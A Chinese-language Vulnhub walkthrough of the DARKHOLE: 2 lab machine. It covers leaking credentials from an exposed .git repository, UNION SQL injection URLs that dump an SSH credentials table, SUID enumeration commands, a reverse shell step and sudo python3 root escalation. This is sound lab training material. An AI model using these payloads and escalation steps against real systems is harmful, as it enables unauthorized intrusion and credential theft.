Vulnhub之DARKHOLE: 2渗透测试

Posted Big&Bird

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub之DARKHOLE: 2渗透测试相关的知识,希望对你有一定的参考价值。

目录

1、靶机概述

Description
Difficulty:Hard

This works better with VMware rather than VirtualBox

Hint: Don’t waste your time For Brute-Force

kali:192.168.110.128
靶机:192.168.110.137

2、信息搜集

首先探测靶机IP地址

扫一下端口和服务,可知靶机只开启了22和80端口。

我们访问一下站点,页面存在登陆接口Login。

点击login,跳转至登陆页面

没有注册接口,靶机也已经提示不要浪费时间在爆破上面
右键查看一下页面源码吧

没有找到有用的信息。
接下来,扫描一下后台目录

发现存在git泄漏,并访问.git目录

分析源码

获取源码:

wget -r //递归下载所有文件
wget -r http://192.168.110.137/.git

这将创建一个名称为 IP 地址的目录。在目录中,它包含递归下载的文件,包括“.git”。

按如下方式克隆

git clone . testweb

这将创建一个 git 存储库“testweb”,我们可以在其中执行所有 git 操作。

进入config目录查看配置

可知数据库名为darkhole_2
继续查看login.php

可以看到做了防sql注入。
然后git log查看更新

看到第2次更新时,login.php使用了默认凭证。
因此,我们将 HEAD 切换到该提交,并查看login.php

找到了用户名和密码,然后登陆平台

找了一遍,不存在上传文件的地方。
不过,将id换成2,访问返回空

直觉告诉我,此处,应该存在sql注入
加上单引号'访问

然后http://192.168.110.137/dashboard.php?id=1%27--+访问正常

3、漏洞利用

order by 猜解表中列数

爆表名

http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database() --+


爆字段
因为要进入后台,我们选择爆ssh表字段。

http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='ssh' --+


爆数据

http://192.168.110.137/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(user,0x3a,pass) from ssh  --+


ssh登录jehad用户

4、获取losy用户shell

如果想提权到root权限,linux系统通常有以下几种方法:

  1. sudo提权,sudo -l 查询具有sudo权限命令,然后提权
  2. SUID提权,查找具有root权限的SUID的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb  \\;
  1. 通过在/etc/passwd添加一个root权限的账户进行提权
find / -writable -type f 2>/dev/null
  1. 内核提权

尝试sudo和SUID提权,均失败

看一下历史命令cat .bash_history

发现可疑命令

执行后,发现是losy用户权限

kali上编写反弹shell,并起http服务

靶机上,将shell文件,下载到tmp文件夹下


5、提权到root

sudo -l提示需要输入密码,而我们现在还不知道losy用户密码

继续查看历史命令

发现losy用户密码为gang
ssh登录losy

sudo -l 查询发现可以使用python3提权

sudo /usr/bin/python3 -c  "import os;os.system('/bin/bash')"

以上是关于Vulnhub之DARKHOLE: 2渗透测试的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub_Darkhole_2

Vulnhub_Darkhole_2

VulnHub渗透测试实战靶场 - DevContainer:1

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2